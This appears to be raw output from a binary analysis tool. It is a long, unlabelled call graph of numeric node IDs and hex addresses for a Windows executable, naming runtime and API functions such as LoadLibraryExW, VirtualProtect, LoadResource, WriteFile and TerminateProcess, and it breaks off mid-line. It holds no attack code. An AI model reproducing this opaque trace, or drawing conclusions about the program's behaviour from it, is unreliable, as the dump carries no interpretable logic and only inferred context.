59 API calls 108998->109002 109000 40f4c6 108999->109000 109001 44441e 108999->109001 109160 40f290 109000->109160 109285 47bc6b 109001->109285 109008 40f58c Mailbox 109002->109008 109005 44442c 109009 40f630 109005->109009 109325 469e4a 89 API calls 4 library calls 109005->109325 109007 40f4fd 109007->109005 109007->109008 109007->109009 109011 40f5e3 109008->109011 109175 463c37 109008->109175 109178 404e4a 109008->109178 109184 47e7f2 109008->109184 109192 47df37 109008->109192 109195 46cb7a 109008->109195 109275 47445a 109008->109275 109009->108895 109011->109009 109284 409c90 59 API calls Mailbox 109011->109284 109018->108895 109019->108825 109020->108830 109021->108895 109022->108835 109023->108835 109024->108835 109025->108895 109026->108895 109027->108895 109029 409851 109028->109029 109038 40984b 109028->109038 109030 43f5d3 __i64tow 109029->109030 109031 409899 109029->109031 109033 409857 __itow 109029->109033 109037 43f4da 109029->109037 110563 423698 83 API calls 3 library calls 109031->110563 109035 420db6 Mailbox 59 API calls 109033->109035 109036 409871 109035->109036 109036->109038 109040 407de1 59 API calls 109036->109040 109039 420db6 Mailbox 59 API calls 109037->109039 109044 43f552 Mailbox _wcscpy 109037->109044 109038->108895 109041 43f51f 109039->109041 109040->109038 109042 420db6 Mailbox 59 API calls 109041->109042 109043 43f545 109042->109043 109043->109044 109045 407de1 59 API calls 109043->109045 110564 423698 83 API calls 3 library calls 109044->110564 109045->109044 109046->108895 109047->108895 109048->108895 109050 420db6 Mailbox 59 API calls 109049->109050 109051 407688 109050->109051 109052 420db6 Mailbox 59 API calls 109051->109052 109053 407696 109052->109053 109053->108881 109054->108881 109055->108881 109057 407df0 __NMSG_WRITE _memmove 109056->109057 109058 420db6 Mailbox 59 API calls 109057->109058 109059 407e2e 109058->109059 109059->108881 109060->108881 109061->108881 109062->108881 109063->108881 109064->108881 109065->108963 109066->108965 109068 407f87 109067->109068 109070 407f9a _memmove 109067->109070 109069 420db6 Mailbox 59 API calls 109068->109069 109068->109070 109069->109070 109070->108996 109071->108996 109082 422c44 109072->109082 109074 422d4b 109074->108979 109075->108996 109076->108996 109077->108996 109078->108996 109079->108994 109080->108996 109081->108996 109083 422c50 __write 109082->109083 109090 423217 109083->109090 109089 422c77 __write 109089->109074 109107 429c0b 109090->109107 109092 422c59 109093 422c88 DecodePointer DecodePointer 109092->109093 109094 422c65 109093->109094 109095 422cb5 109093->109095 109104 422c82 109094->109104 109095->109094 109153 4287a4 59 API calls __ftell_nolock 109095->109153 109097 422d18 EncodePointer EncodePointer 109097->109094 109098 422cec 109098->109094 109102 422d06 EncodePointer 109098->109102 109155 428864 61 API calls __realloc_crt 109098->109155 109099 422cc7 109099->109097 109099->109098 109154 428864 61 API calls __realloc_crt 109099->109154 109102->109097 109103 422d00 109103->109094 109103->109102 109156 423220 109104->109156 109108 429c2f EnterCriticalSection 109107->109108 109109 429c1c 109107->109109 109108->109092 109114 429c93 109109->109114 109111 429c22 109111->109108 109138 4230b5 58 API calls 3 library calls 109111->109138 109115 429c9f __write 109114->109115 109116 429cc0 109115->109116 109117 429ca8 109115->109117 109126 429ce1 __write 109116->109126 109142 42881d 58 API calls 2 library calls 109116->109142 109139 42a16b 58 API calls __NMSG_WRITE 109117->109139 109120 429cad 109140 42a1c8 58 API calls 6 library calls 109120->109140 109121 429cd5 109124 429ceb 109121->109124 109125 429cdc 109121->109125 109123 429cb4 109141 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 109123->109141 109129 429c0b __lock 58 API calls 109124->109129 109143 428b28 58 API calls __getptd_noexit 109125->109143 109126->109111 109131 429cf2 109129->109131 109132 429d17 109131->109132 109133 429cff 109131->109133 109145 422d55 109132->109145 109144 429e2b InitializeCriticalSectionAndSpinCount 109133->109144 109136 429d0b 109151 429d33 LeaveCriticalSection _doexit 109136->109151 109139->109120 109140->109123 109142->109121 109143->109126 109144->109136 109146 422d5e RtlFreeHeap 109145->109146 109150 422d87 __dosmaperr 109145->109150 109147 422d73 109146->109147 109146->109150 109152 428b28 58 API calls __getptd_noexit 109147->109152 109149 422d79 GetLastError 109149->109150 109150->109136 109151->109126 109152->109149 109153->109099 109154->109098 109155->109103 109159 429d75 LeaveCriticalSection 109156->109159 109158 422c87 109158->109089 109159->109158 109161 40f43a 109160->109161 109164 40f2bc 109160->109164 109327 469e4a 89 API calls 4 library calls 109161->109327 109163 4443a9 109163->109007 109164->109161 109172 40f2f9 _memmove 109164->109172 109165 40f3d3 109166 40f3e3 109165->109166 109326 47a2d9 85 API calls Mailbox 109165->109326 109166->109007 109168 420db6 59 API calls Mailbox 109168->109172 109169 4443f9 109329 40f6a3 341 API calls 109169->109329 109170 409ea0 341 API calls 109170->109172 109172->109163 109172->109165 109172->109168 109172->109169 109172->109170 109173 4443ab 109172->109173 109328 469e4a 89 API calls 4 library calls 109173->109328 109330 46445a GetFileAttributesW 109175->109330 109179 404e54 109178->109179 109181 404e5b 109178->109181 109334 4253a6 109179->109334 109182 404e6a 109181->109182 109183 404e7b FreeLibrary 109181->109183 109182->109011 109183->109182 109186 47e835 109184->109186 109191 47e80e 109184->109191 109185 47e857 109189 47e89b 109185->109189 109185->109191 109638 409b3c 59 API calls 109185->109638 109186->109185 109637 409b3c 59 API calls 109186->109637 109604 46625d 109189->109604 109191->109011 109703 47cadd 109192->109703 109194 47df47 109194->109011 109196 407667 59 API calls 109195->109196 109197 46cbaf 109196->109197 109198 407667 59 API calls 109197->109198 109199 46cbb8 109198->109199 109200 46cbcc 109199->109200 110031 409b3c 59 API calls 109199->110031 109202 409837 84 API calls 109200->109202 109203 46cbe9 109202->109203 109204 46ccea 109203->109204 109205 46cc0b 109203->109205 109217 46cd1a Mailbox 109203->109217 109835 404ddd 109204->109835 109206 409837 84 API calls 109205->109206 109208 46cc17 109206->109208 109210 408047 59 API calls 109208->109210 109213 46cc23 109210->109213 109219 46cc37 109213->109219 109220 46cc69 109213->109220 109217->109011 109223 408047 59 API calls 109219->109223 109221 409837 84 API calls 109220->109221 109224 46cc76 109221->109224 109226 46cc47 109223->109226 109227 408047 59 API calls 109224->109227 110032 407cab 109226->110032 109230 46cc82 109227->109230 110039 464a31 GetFileAttributesW 109230->110039 109235 409837 84 API calls 109238 46cc5d 109235->109238 109236 46cc8b 109240 46cc9e 109236->109240 109242 4079f2 59 API calls 109236->109242 109239 407b2e 59 API calls 109238->109239 109239->109220 109244 409837 84 API calls 109240->109244 109249 46cca4 109240->109249 109242->109240 109245 46cccb 109244->109245 110040 4637ef 75 API calls Mailbox 109245->110040 109249->109217 109276 409837 84 API calls 109275->109276 109277 474494 109276->109277 110504 406240 109277->110504 109279 4744a4 109280 4744c9 109279->109280 109281 409ea0 341 API calls 109279->109281 109283 4744cd 109280->109283 110529 409a98 109280->110529 109281->109280 109283->109011 109284->109011 109286 47bc96 109285->109286 109287 47bcb0 109285->109287 110555 469e4a 89 API calls 4 library calls 109286->110555 110556 47a213 59 API calls Mailbox 109287->110556 109290 47bcbb 109291 409ea0 340 API calls 109290->109291 109292 47bd1c 109291->109292 109293 47bca8 Mailbox 109292->109293 109294 47bdae 109292->109294 109298 47bd5d 109292->109298 109293->109005 109295 47be04 109294->109295 109296 47bdb4 109294->109296 109295->109293 109297 409837 84 API calls 109295->109297 110558 46791a 59 API calls 109296->110558 109299 47be16 109297->109299 110557 4672df 59 API calls Mailbox 109298->110557 109302 407e4f 59 API calls 109299->109302 109305 47be3a CharUpperBuffW 109302->109305 109303 47bdd7 110559 405d41 59 API calls Mailbox 109303->110559 109304 47bd8d 109307 40f460 340 API calls 109304->109307 109309 47be54 109305->109309 109307->109293 109308 47bddf Mailbox 109312 40fce0 340 API calls 109308->109312 109310 47bea7 109309->109310 109311 47be5b 109309->109311 109313 409837 84 API calls 109310->109313 110560 4672df 59 API calls Mailbox 109311->110560 109312->109293 109314 47beaf 109313->109314 110561 409e5d 60 API calls 109314->110561 109317 47be89 109318 40f460 340 API calls 109317->109318 109318->109293 109319 47beb9 109319->109293 109320 409837 84 API calls 109319->109320 109321 47bed4 109320->109321 110562 405d41 59 API calls Mailbox 109321->110562 109323 47bee4 109324 40fce0 340 API calls 109323->109324 109324->109293 109325->109009 109326->109166 109327->109163 109328->109163 109329->109163 109331 463c3e 109330->109331 109332 464475 FindFirstFileW 109330->109332 109331->109011 109332->109331 109333 46448a FindClose 109332->109333 109333->109331 109335 4253b2 __write 109334->109335 109336 4253c6 109335->109336 109337 4253de 109335->109337 109369 428b28 58 API calls __getptd_noexit 109336->109369 109343 4253d6 __write 109337->109343 109347 426c11 109337->109347 109339 4253cb 109370 428db6 9 API calls __ftell_nolock 109339->109370 109343->109181 109348 426c43 EnterCriticalSection 109347->109348 109349 426c21 109347->109349 109350 4253f0 109348->109350 109349->109348 109351 426c29 109349->109351 109353 42533a 109350->109353 109352 429c0b __lock 58 API calls 109351->109352 109352->109350 109354 425349 109353->109354 109355 42535d 109353->109355 109415 428b28 58 API calls __getptd_noexit 109354->109415 109361 425359 109355->109361 109372 424a3d 109355->109372 109357 42534e 109416 428db6 9 API calls __ftell_nolock 109357->109416 109371 425415 LeaveCriticalSection LeaveCriticalSection _fseek 109361->109371 109365 425377 109389 430a02 109365->109389 109367 42537d 109367->109361 109368 422d55 _free 58 API calls 109367->109368 109368->109361 109369->109339 109370->109343 109371->109343 109373 424a50 109372->109373 109377 424a74 109372->109377 109374 4246e6 __ftell_nolock 58 API calls 109373->109374 109373->109377 109375 424a6d 109374->109375 109417 42d886 109375->109417 109378 430b77 109377->109378 109379 425371 109378->109379 109380 430b84 109378->109380 109382 4246e6 109379->109382 109380->109379 109381 422d55 _free 58 API calls 109380->109381 109381->109379 109383 4246f0 109382->109383 109384 424705 109382->109384 109559 428b28 58 API calls __getptd_noexit 109383->109559 109384->109365 109386 4246f5 109560 428db6 9 API calls __ftell_nolock 109386->109560 109388 424700 109388->109365 109390 430a0e __write 109389->109390 109391 430a32 109390->109391 109392 430a1b 109390->109392 109394 430abd 109391->109394 109397 430a42 109391->109397 109576 428af4 58 API calls __getptd_noexit 109392->109576 109581 428af4 58 API calls __getptd_noexit 109394->109581 109396 430a20 109577 428b28 58 API calls __getptd_noexit 109396->109577 109398 430a60 109397->109398 109399 430a6a 109397->109399 109578 428af4 58 API calls __getptd_noexit 109398->109578 109403 42d206 ___lock_fhandle 59 API calls 109399->109403 109400 430a65 109582 428b28 58 API calls __getptd_noexit 109400->109582 109405 430a70 109403->109405 109407 430a83 109405->109407 109408 430a8e 109405->109408 109406 430ac9 109583 428db6 9 API calls __ftell_nolock 109406->109583 109561 430add 109407->109561 109579 428b28 58 API calls __getptd_noexit 109408->109579 109411 430a27 __write 109411->109367 109413 430a89 109580 430ab5 LeaveCriticalSection __unlock_fhandle 109413->109580 109415->109357 109416->109361 109418 42d892 __write 109417->109418 109419 42d8b6 109418->109419 109420 42d89f 109418->109420 109422 42d955 109419->109422 109425 42d8ca 109419->109425 109518 428af4 58 API calls __getptd_noexit 109420->109518 109524 428af4 58 API calls __getptd_noexit 109422->109524 109424 42d8a4 109519 428b28 58 API calls __getptd_noexit 109424->109519 109426 42d8f2 109425->109426 109427 42d8e8 109425->109427 109445 42d206 109426->109445 109520 428af4 58 API calls __getptd_noexit 109427->109520 109431 42d8ed 109525 428b28 58 API calls __getptd_noexit 109431->109525 109432 42d8f8 109434 42d90b 109432->109434 109435 42d91e 109432->109435 109454 42d975 109434->109454 109521 428b28 58 API calls __getptd_noexit 109435->109521 109436 42d961 109526 428db6 9 API calls __ftell_nolock 109436->109526 109440 42d8ab __write 109440->109377 109441 42d917 109523 42d94d LeaveCriticalSection __unlock_fhandle 109441->109523 109442 42d923 109522 428af4 58 API calls __getptd_noexit 109442->109522 109446 42d212 __write 109445->109446 109447 42d261 EnterCriticalSection 109446->109447 109448 429c0b __lock 58 API calls 109446->109448 109449 42d287 __write 109447->109449 109450 42d237 109448->109450 109449->109432 109451 42d24f 109450->109451 109527 429e2b InitializeCriticalSectionAndSpinCount 109450->109527 109528 42d28b LeaveCriticalSection _doexit 109451->109528 109455 42d982 __ftell_nolock 109454->109455 109456 42d9e0 109455->109456 109457 42d9c1 109455->109457 109487 42d9b6 109455->109487 109461 42da38 109456->109461 109462 42da1c 109456->109462 109538 428af4 58 API calls __getptd_noexit 109457->109538 109460 42d9c6 109539 428b28 58 API calls __getptd_noexit 109460->109539 109465 42da51 109461->109465 109544 4318c1 60 API calls 3 library calls 109461->109544 109541 428af4 58 API calls __getptd_noexit 109462->109541 109463 42e1d6 109463->109441 109529 435c6b 109465->109529 109467 42d9cd 109540 428db6 9 API calls __ftell_nolock 109467->109540 109470 42da21 109542 428b28 58 API calls __getptd_noexit 109470->109542 109472 42da5f 109474 42ddb8 109472->109474 109545 4299ac 58 API calls 2 library calls 109472->109545 109476 42ddd6 109474->109476 109477 42e14b WriteFile 109474->109477 109475 42da28 109543 428db6 9 API calls __ftell_nolock 109475->109543 109480 42defa 109476->109480 109485 42ddec 109476->109485 109481 42ddab GetLastError 109477->109481 109489 42dd78 109477->109489 109492 42df05 109480->109492 109495 42dfef 109480->109495 109481->109489 109482 42da8b GetConsoleMode 109482->109474 109484 42daca 109482->109484 109483 42e184 109483->109487 109550 428b28 58 API calls __getptd_noexit 109483->109550 109484->109474 109490 42dada GetConsoleCP 109484->109490 109485->109483 109486 42de5b WriteFile 109485->109486 109486->109481 109491 42de98 109486->109491 109552 42c5f6 109487->109552 109489->109483 109489->109487 109494 42ded8 109489->109494 109490->109483 109514 42db09 109490->109514 109491->109485 109497 42debc 109491->109497 109492->109483 109498 42df6a WriteFile 109492->109498 109493 42e1b2 109551 428af4 58 API calls __getptd_noexit 109493->109551 109500 42dee3 109494->109500 109501 42e17b 109494->109501 109495->109483 109496 42e064 WideCharToMultiByte 109495->109496 109496->109481 109510 42e0ab 109496->109510 109497->109489 109498->109481 109502 42dfb9 109498->109502 109547 428b28 58 API calls __getptd_noexit 109500->109547 109549 428b07 58 API calls 3 library calls 109501->109549 109502->109489 109502->109492 109502->109497 109505 42e0b3 WriteFile 109508 42e106 GetLastError 109505->109508 109505->109510 109506 42dee8 109548 428af4 58 API calls __getptd_noexit 109506->109548 109508->109510 109510->109489 109510->109495 109510->109497 109510->109505 109511 42dbf2 WideCharToMultiByte 109511->109489 109513 42dc2d WriteFile 109511->109513 109512 4362ba 60 API calls __write_nolock 109512->109514 109513->109481 109516 42dc5f 109513->109516 109514->109489 109514->109511 109514->109512 109514->109516 109546 4235f5 58 API calls __isleadbyte_l 109514->109546 109515 437a5e WriteConsoleW CreateFileW __putwch_nolock 109515->109516 109516->109481 109516->109489 109516->109514 109516->109515 109517 42dc87 WriteFile 109516->109517 109517->109481 109517->109516 109518->109424 109519->109440 109520->109431 109521->109442 109522->109441 109523->109440 109524->109431 109525->109436 109526->109440 109527->109451 109528->109447 109530 435c83 109529->109530 109531 435c76 109529->109531 109534 435c8f 109530->109534 109535 428b28 __ftell_nolock 58 API calls 109530->109535 109532 428b28 __ftell_nolock 58 API calls 109531->109532 109533 435c7b 109532->109533 109533->109472 109534->109472 109536 435cb0 109535->109536 109537 428db6 __ftell_nolock 9 API calls 109536->109537 109537->109533 109538->109460 109539->109467 109540->109487 109541->109470 109542->109475 109543->109487 109544->109465 109545->109482 109546->109514 109547->109506 109548->109487 109549->109487 109550->109493 109551->109487 109553 42c600 IsProcessorFeaturePresent 109552->109553 109554 42c5fe 109552->109554 109556 43590a 109553->109556 109554->109463 109557 4358b9 ___raise_securityfailure 5 API calls 109556->109557 109558 4359ed 109557->109558 109558->109463 109559->109386 109560->109388 109584 42d4c3 109561->109584 109563 430b41 109597 42d43d 59 API calls 2 library calls 109563->109597 109565 430aeb 109565->109563 109566 42d4c3 __lseeki64_nolock 58 API calls 109565->109566 109575 430b1f 109565->109575 109570 430b16 109566->109570 109567 42d4c3 __lseeki64_nolock 58 API calls 109571 430b2b CloseHandle 109567->109571 109568 430b6b 109568->109413 109569 430b49 109569->109568 109598 428b07 58 API calls 3 library calls 109569->109598 109574 42d4c3 __lseeki64_nolock 58 API calls 109570->109574 109571->109563 109572 430b37 GetLastError 109571->109572 109572->109563 109574->109575 109575->109563 109575->109567 109576->109396 109577->109411 109578->109400 109579->109413 109580->109411 109581->109400 109582->109406 109583->109411 109585 42d4e3 109584->109585 109586 42d4ce 109584->109586 109592 42d508 109585->109592 109601 428af4 58 API calls __getptd_noexit 109585->109601 109599 428af4 58 API calls __getptd_noexit 109586->109599 109589 42d4d3 109600 428b28 58 API calls __getptd_noexit 109589->109600 109590 42d512 109602 428b28 58 API calls __getptd_noexit 109590->109602 109592->109565 109594 42d4db 109594->109565 109595 42d51a 109603 428db6 9 API calls __ftell_nolock 109595->109603 109597->109569 109598->109568 109599->109589 109600->109594 109601->109590 109602->109595 109603->109594 109639 46617a 109604->109639 109607 4662f6 109610 466366 109607->109610 109613 46635c 109607->109613 109619 46630f 109607->109619 109608 4662de 109655 4664b8 89 API calls 2 library calls 109608->109655 109611 466396 109610->109611 109612 4663e4 109610->109612 109631 466282 _memmove 109610->109631 109617 4663b6 109611->109617 109618 46639b 109611->109618 109615 46647f 109612->109615 109616 4663eb 109612->109616 109613->109610 109614 466343 109613->109614 109646 4676c4 109614->109646 109615->109631 109665 409be6 59 API calls 109615->109665 109620 466461 109616->109620 109621 4663ee 109616->109621 109617->109631 109661 409b98 59 API calls 109617->109661 109618->109631 109660 409b98 59 API calls 109618->109660 109656 468715 109619->109656 109620->109631 109664 409be6 59 API calls 109620->109664 109626 4663f2 109621->109626 109627 46642a 109621->109627 109626->109631 109662 409be6 59 API calls 109626->109662 109627->109631 109663 409be6 59 API calls 109627->109663 109631->109191 109632 466317 109634 468715 61 API calls 109632->109634 109635 46632e _memmove 109634->109635 109636 468715 61 API calls 109635->109636 109636->109614 109637->109185 109638->109189 109640 4661ca 109639->109640 109644 46618b 109639->109644 109676 409b3c 59 API calls 109640->109676 109641 4661c8 109641->109607 109641->109608 109641->109631 109643 409837 84 API calls 109643->109644 109644->109641 109644->109643 109666 422efd 109644->109666 109647 4676cf 109646->109647 109648 420db6 Mailbox 59 API calls 109647->109648 109649 4676d6 109648->109649 109650 4676e2 109649->109650 109651 467703 109649->109651 109653 420db6 Mailbox 59 API calls 109650->109653 109652 420db6 Mailbox 59 API calls 109651->109652 109654 4676eb _memset 109652->109654 109653->109654 109654->109631 109655->109631 109657 46871e 109656->109657 109659 468723 109656->109659 109680 4677b3 109657->109680 109659->109632 109660->109631 109661->109631 109662->109631 109663->109631 109664->109631 109665->109631 109667 422f09 109666->109667 109668 422f7e 109666->109668 109674 422f2e 109667->109674 109677 428b28 58 API calls __getptd_noexit 109667->109677 109679 422f90 60 API calls 3 library calls 109668->109679 109671 422f8b 109671->109644 109672 422f15 109678 428db6 9 API calls __ftell_nolock 109672->109678 109674->109644 109675 422f20 109675->109644 109676->109641 109677->109672 109678->109675 109679->109671 109681 4678ea 109680->109681 109683 4677ca 109680->109683 109681->109659 109682 46780a 109684 420db6 Mailbox 59 API calls 109682->109684 109683->109682 109685 467821 109683->109685 109686 4677e2 109683->109686 109700 467800 Mailbox _memmove 109684->109700 109688 46783e 109685->109688 109691 420db6 Mailbox 59 API calls 109685->109691 109686->109682 109687 4677f2 109686->109687 109694 420db6 Mailbox 59 API calls 109687->109694 109689 467877 109688->109689 109690 467869 109688->109690 109688->109700 109693 420db6 Mailbox 59 API calls 109689->109693 109692 420db6 Mailbox 59 API calls 109690->109692 109691->109688 109692->109700 109695 46787d 109693->109695 109694->109700 109701 46746b 59 API calls Mailbox 109695->109701 109696 420db6 Mailbox 59 API calls 109696->109681 109698 467889 109702 405a15 61 API calls Mailbox 109698->109702 109700->109696 109701->109698 109702->109700 109704 409837 84 API calls 109703->109704 109705 47cb1a 109704->109705 109729 47cb61 Mailbox 109705->109729 109741 47d7a5 109705->109741 109707 47cdb9 109708 47cf2e 109707->109708 109712 47cdc7 109707->109712 109791 47d8c8 92 API calls Mailbox 109708->109791 109711 47cf3d 109711->109712 109714 47cf49 109711->109714 109754 47c96e 109712->109754 109713 409837 84 API calls 109732 47cbb2 Mailbox 109713->109732 109714->109729 109719 47ce00 109769 420c08 109719->109769 109722 47ce33 109776 4092ce 109722->109776 109723 47ce1a 109775 469e4a 89 API calls 4 library calls 109723->109775 109726 47ce25 GetCurrentProcess TerminateProcess 109726->109722 109729->109194 109732->109707 109732->109713 109732->109729 109773 47fbce 59 API calls 2 library calls 109732->109773 109774 47cfdf 61 API calls 2 library calls 109732->109774 109733 47cfa4 109733->109729 109737 47cfb8 FreeLibrary 109733->109737 109734 47ce6b 109788 47d649 107 API calls _free 109734->109788 109737->109729 109740 47ce7c 109740->109733 109789 408d40 59 API calls Mailbox 109740->109789 109790 409d3c 60 API calls Mailbox 109740->109790 109792 47d649 107 API calls _free 109740->109792 109742 407e4f 59 API calls 109741->109742 109743 47d7c0 CharLowerBuffW 109742->109743 109793 45f167 109743->109793 109747 407667 59 API calls 109748 47d7f9 109747->109748 109800 40784b 109748->109800 109750 47d810 109813 407d2c 109750->109813 109751 47d858 Mailbox 109751->109732 109753 47d81c Mailbox 109753->109751 109817 47cfdf 61 API calls 2 library calls 109753->109817 109755 47c989 109754->109755 109759 47c9de 109754->109759 109756 420db6 Mailbox 59 API calls 109755->109756 109758 47c9ab 109756->109758 109757 420db6 Mailbox 59 API calls 109757->109758 109758->109757 109758->109759 109760 47da50 109759->109760 109761 47dc79 Mailbox 109760->109761 109768 47da73 _strcat _wcscpy __NMSG_WRITE 109760->109768 109761->109719 109762 409b98 59 API calls 109762->109768 109763 409be6 59 API calls 109763->109768 109764 409b3c 59 API calls 109764->109768 109765 409837 84 API calls 109765->109768 109766 42571c 58 API calls __crtCompareStringA_stat 109766->109768 109768->109761 109768->109762 109768->109763 109768->109764 109768->109765 109768->109766 109824 465887 61 API calls 2 library calls 109768->109824 109771 420c1d 109769->109771 109770 420cb5 VirtualProtect 109772 420c83 109770->109772 109771->109770 109771->109772 109772->109722 109772->109723 109773->109732 109774->109732 109775->109726 109777 4092d6 109776->109777 109778 420db6 Mailbox 59 API calls 109777->109778 109779 4092e4 109778->109779 109780 4092f0 109779->109780 109825 4091fc 59 API calls Mailbox 109779->109825 109782 409050 109780->109782 109826 409160 109782->109826 109784 420db6 Mailbox 59 API calls 109786 4090fb 109784->109786 109785 40905f 109785->109784 109785->109786 109786->109740 109787 408d40 59 API calls Mailbox 109786->109787 109787->109734 109788->109740 109789->109740 109790->109740 109791->109711 109792->109740 109794 45f192 __NMSG_WRITE 109793->109794 109795 45f1d1 109794->109795 109798 45f1c7 109794->109798 109799 45f278 109794->109799 109795->109747 109795->109753 109798->109795 109818 4078c4 61 API calls 109798->109818 109799->109795 109819 4078c4 61 API calls 109799->109819 109801 4078b7 109800->109801 109802 40785a 109800->109802 109803 407d2c 59 API calls 109801->109803 109802->109801 109804 407865 109802->109804 109805 407888 _memmove 109803->109805 109806 407880 109804->109806 109807 43eb09 109804->109807 109805->109750 109820 407f27 59 API calls Mailbox 109806->109820 109821 408029 109807->109821 109810 43eb13 109811 420db6 Mailbox 59 API calls 109810->109811 109812 43eb33 109811->109812 109814 407d3a 109813->109814 109816 407d43 _memmove 109813->109816 109815 407e4f 59 API calls 109814->109815 109814->109816 109815->109816 109816->109753 109817->109751 109818->109798 109819->109799 109820->109805 109822 420db6 Mailbox 59 API calls 109821->109822 109823 408033 109822->109823 109823->109810 109824->109768 109825->109780 109827 409169 Mailbox 109826->109827 109828 43f19f 109827->109828 109833 409173 109827->109833 109829 420db6 Mailbox 59 API calls 109828->109829 109830 43f1ab 109829->109830 109831 40917a 109831->109785 109833->109831 109834 409c90 59 API calls Mailbox 109833->109834 109834->109833 110050 404bb5 109835->110050 109840 43d8e6 109843 404e4a 84 API calls 109840->109843 109841 404e08 LoadLibraryExW 110060 404b6a 109841->110060 109845 43d8ed 109843->109845 109847 404b6a 3 API calls 109845->109847 109849 43d8f5 109847->109849 109848 404e2f 109848->109849 109850 404e3b 109848->109850 110086 404f0b 109849->110086 109856 43d91c 110094 404ec7 109856->110094 110031->109200 110033 43ed4a 110032->110033 110034 407cbf 110032->110034 110035 408029 59 API calls 110033->110035 110498 407c50 110034->110498 110038 43ed55 __NMSG_WRITE _memmove 110035->110038 110037 407cca 110037->109235 110039->109236 110040->109249 110099 404c03 110050->110099 110053 404bdc 110054 404bf5 110053->110054 110055 404bec FreeLibrary 110053->110055 110057 42525b 110054->110057 110055->110054 110056 404c03 2 API calls 110056->110053 110103 425270 110057->110103 110059 404dfc 110059->109840 110059->109841 110184 404c36 110060->110184 110063 404c36 2 API calls 110066 404b8f 110063->110066 110064 404ba1 FreeLibrary 110065 404baa 110064->110065 110067 404c70 110065->110067 110066->110064 110066->110065 110068 420db6 Mailbox 59 API calls 110067->110068 110069 404c85 110068->110069 110188 40522e 110069->110188 110071 404c91 _memmove 110072 404ccc 110071->110072 110073 404dc1 110071->110073 110074 404d89 110071->110074 110075 404ec7 69 API calls 110072->110075 110202 46991b 95 API calls 110073->110202 110191 404e89 CreateStreamOnHGlobal 110074->110191 110081 404cd5 110075->110081 110078 404f0b 74 API calls 110078->110081 110079 404d69 110079->109848 110081->110078 110081->110079 110082 43d8a7 110081->110082 110197 404ee5 110081->110197 110083 404ee5 85 API calls 110082->110083 110084 43d8bb 110083->110084 110085 404f0b 74 API calls 110084->110085 110085->110079 110087 404f1d 110086->110087 110088 43d9cd 110086->110088 110220 4255e2 110087->110220 110091 469109 110345 468f5f 110091->110345 110093 46911f 110093->109856 110100 404bd0 110099->110100 110101 404c0c LoadLibraryA 110099->110101 110100->110053 110100->110056 110101->110100 110102 404c1d GetProcAddress 110101->110102 110102->110100 110106 42527c __write 110103->110106 110104 42528f 110152 428b28 58 API calls __getptd_noexit 110104->110152 110106->110104 110108 4252c0 110106->110108 110107 425294 110153 428db6 9 API calls __ftell_nolock 110107->110153 110122 4304e8 110108->110122 110111 4252c5 110112 4252db 110111->110112 110113 4252ce 110111->110113 110115 425305 110112->110115 110116 4252e5 110112->110116 110154 428b28 58 API calls __getptd_noexit 110113->110154 110137 430607 110115->110137 110155 428b28 58 API calls __getptd_noexit 110116->110155 110118 42529f __write @_EH4_CallFilterFunc@8 110118->110059 110123 4304f4 __write 110122->110123 110124 429c0b __lock 58 API calls 110123->110124 110135 430502 110124->110135 110125 430576 110157 4305fe 110125->110157 110126 43057d 110162 42881d 58 API calls 2 library calls 110126->110162 110129 4305f3 __write 110129->110111 110130 430584 110130->110125 110163 429e2b InitializeCriticalSectionAndSpinCount 110130->110163 110132 429c93 __mtinitlocknum 58 API calls 110132->110135 110134 4305aa EnterCriticalSection 110134->110125 110135->110125 110135->110126 110135->110132 110160 426c50 59 API calls __lock 110135->110160 110161 426cba LeaveCriticalSection LeaveCriticalSection _doexit 110135->110161 110145 430627 __wopenfile 110137->110145 110138 430641 110168 428b28 58 API calls __getptd_noexit 110138->110168 110140 430646 110169 428db6 9 API calls __ftell_nolock 110140->110169 110142 425310 110156 425332 LeaveCriticalSection LeaveCriticalSection _fseek 110142->110156 110143 43085f 110165 4385a1 110143->110165 110145->110138 110151 4307fc 110145->110151 110170 4237cb 60 API calls 2 library calls 110145->110170 110147 4307f5 110147->110151 110171 4237cb 60 API calls 2 library calls 110147->110171 110149 430814 110149->110151 110172 4237cb 60 API calls 2 library calls 110149->110172 110151->110138 110151->110143 110152->110107 110153->110118 110154->110118 110155->110118 110156->110118 110164 429d75 LeaveCriticalSection 110157->110164 110159 430605 110159->110129 110160->110135 110161->110135 110162->110130 110163->110134 110164->110159 110173 437d85 110165->110173 110167 4385ba 110167->110142 110168->110140 110169->110142 110170->110147 110171->110149 110172->110151 110174 437d91 __write 110173->110174 110175 437da7 110174->110175 110178 437ddd 110174->110178 110176 428b28 __ftell_nolock 58 API calls 110175->110176 110177 437dac 110176->110177 110179 428db6 __ftell_nolock 9 API calls 110177->110179 110180 437e4e __wsopen_nolock 109 API calls 110178->110180 110183 437db6 __write 110179->110183 110181 437df9 110180->110181 110182 437e22 __wsopen_helper LeaveCriticalSection 110181->110182 110182->110183 110183->110167 110185 404b83 110184->110185 110186 404c3f LoadLibraryA 110184->110186 110185->110063 110185->110066 110186->110185 110187 404c50 GetProcAddress 110186->110187 110187->110185 110189 420db6 Mailbox 59 API calls 110188->110189 110190 405240 110189->110190 110190->110071 110192 404ea3 FindResourceExW 110191->110192 110196 404ec0 110191->110196 110193 43d933 LoadResource 110192->110193 110192->110196 110194 43d948 SizeofResource 110193->110194 110193->110196 110195 43d95c LockResource 110194->110195 110194->110196 110195->110196 110196->110072 110198 404ef4 110197->110198 110199 43d9ab 110197->110199 110203 42584d 110198->110203 110202->110072 110223 4255fd 110220->110223 110222 404f2e 110222->110091 110224 425609 __write 110223->110224 110225 42561f _memset 110224->110225 110226 42564c 110224->110226 110227 425644 __write 110224->110227 110250 428b28 58 API calls __getptd_noexit 110225->110250 110228 426c11 __lock_file 59 API calls 110226->110228 110227->110222 110229 425652 110228->110229 110236 42541d 110229->110236 110232 425639 110251 428db6 9 API calls __ftell_nolock 110232->110251 110237 425453 110236->110237 110240 425438 _memset 110236->110240 110252 425686 LeaveCriticalSection LeaveCriticalSection _fseek 110237->110252 110238 425443 110341 428b28 58 API calls __getptd_noexit 110238->110341 110240->110237 110240->110238 110247 425493 110240->110247 110243 4255a4 _memset 110344 428b28 58 API calls __getptd_noexit 110243->110344 110245 4246e6 __ftell_nolock 58 API calls 110245->110247 110247->110237 110247->110243 110247->110245 110253 430e5b 110247->110253 110321 430ba7 110247->110321 110343 430cc8 58 API calls 3 library calls 110247->110343 110249 425448 110342 428db6 9 API calls __ftell_nolock 110249->110342 110250->110232 110251->110227 110252->110227 110254 430e93 110253->110254 110255 